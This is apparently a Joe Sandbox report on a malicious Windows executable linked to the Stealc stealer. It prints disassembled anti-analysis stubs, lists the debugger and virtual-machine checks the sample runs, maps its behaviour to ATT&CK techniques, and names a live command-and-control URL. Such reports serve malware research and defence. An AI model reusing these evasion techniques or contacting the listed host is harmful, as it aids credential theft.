                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B03A second address: 137B0B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007EFD80CDE8C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D38F0h], eax 0x0000002b mov ebx, dword ptr [ebp+1248C008h] 0x00000031 or di, 6497h 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007EFD80CDE8C8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D1D1Ah], ebx 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007EFD80CDE8D0h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B0B2 second address: 137B0B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B0B7 second address: 137B0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007EFD80CDE8CDh 0x0000000d nop 0x0000000e xor edi, 2553C534h 0x00000014 push 00000004h 0x00000016 mov ecx, dword ptr [ebp+122D1C82h] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007EFD80CDE8CCh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3FA6 second address: 13D3FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7A0 second address: 13DC7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7A4 second address: 13DC7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD80CCF02Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC7B8 second address: 13DC7D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CDE8D9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DA930 second address: 13DA944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAAEE second address: 13DAB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007EFD80CDE8C6h 0x0000000c jmp 00007EFD80CDE8D5h 0x00000011 jg 00007EFD80CDE8C6h 0x00000017 js 00007EFD80CDE8C6h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE35 second address: 13DAE53 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007EFD80CCF02Dh 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007EFD80CCF043h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE53 second address: 13DAE72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D7h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE72 second address: 13DAE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE78 second address: 13DAE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE7C second address: 13DAE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFD80CCF02Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAE90 second address: 13DAEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DAEA7 second address: 13DAEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB442 second address: 13DB462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007EFD80CDE8CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB728 second address: 13DB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBC44 second address: 13DBC4E instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DBF0C second address: 13DBF2B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007EFD80CCF036h 0x0000000c jmp 00007EFD80CCF030h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11C1D3E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11C1E17 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 136D5CA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11BF005 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13FE7D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F74570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F73EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F6DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F61160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1466069910.0000000001754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1466069910.0000000001754000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1466069910.0000000001723000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13249
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13252
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13303
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13263
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13271
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F645C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00F645C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F79860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79750 mov eax, dword ptr fs:[00000030h] 0_2_00F79750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F778E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00F778E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F79600
Source: file.exe, file.exe, 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ]~Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F77B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F77980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00F77980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F77850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F77850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F77A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F77A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7460, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix: techniques matched by this sample, grouped by tactic (the number in parentheses is the report's match count; tactics with no matched technique are omitted)

• Execution: Command and Scripting Interpreter (2), Native API (11)
• Persistence: DLL Side-Loading (1)
• Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
• Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
• Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
• Collection: Archive Collected Data (1)
• Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
http://185.215.113.206/e2b1563c6670f193.php/ | 7% | Virustotal
http://185.215.113.206/ | 15% | Virustotal
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true |  | unknown
http://185.215.113.206/e2b1563c6670f193.php | true |  | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | true |  | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206/e2b1563c6670f193.phpX | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206/e2b1563c6670f193.php2 | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206/e2b1563c6670f193.phpD | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206/w9 | file.exe, 00000000.00000002.1466069910.0000000001738000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
http://185.215.113.206gw0 | file.exe, 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1542734
                                Start date and time:2024-10-26 08:51:27 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 2s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 79
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Stealc | 185.215.113.206/e2b1563c6670f193.php
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | T52Z708x2p.exe | malicious | Phorpiex, Xmrig | 185.215.113.84
WHOLESALECONNECTIONSNL | lJ4EzPSKMj.exe | malicious | Phorpiex, Xmrig | 185.215.113.84
WHOLESALECONNECTIONSNL | Us051y7j25.exe | malicious | Phorpiex, Xmrig | 185.215.113.84
WHOLESALECONNECTIONSNL | thcdVit1dX.exe | malicious | Phorpiex | 185.215.113.66
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947326293618379
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'872'384 bytes
                                MD5:79ad5f851a1231db208f005432d0cf1c
                                SHA1:67776523d7821292da1ced82653558a60b8a7f19
                                SHA256:ab409dfe5cafaa8a881a844cd26eed91995b9546528e494db3b46f26812824eb
                                SHA512:2b1a2375cea5e30cb4da43a1f539ff920cdb6bd1a758b2ee8c8d7fcd75d540b6eb81330b3313e1ebf43da22110d818e3d6e5df869c6751dadf1901dd57722cbd
                                SSDEEP:49152:FGr4CilaGYbJQlw/NGMDweoVnrfcXCNuX7Ik:FGr4CsaGamiweGG0
                                TLSH:578533D56EF3D0A8D0CBA33568312322B0D2494199FDE0F5EEEE13629967E196382533
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xaac000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007EFD807EB00Ah
                                pshufw mm3, qword ptr [eax+eax], 00h
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+00000000h], al
                                add byte ptr [eax], al
                                add byte ptr [edx], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
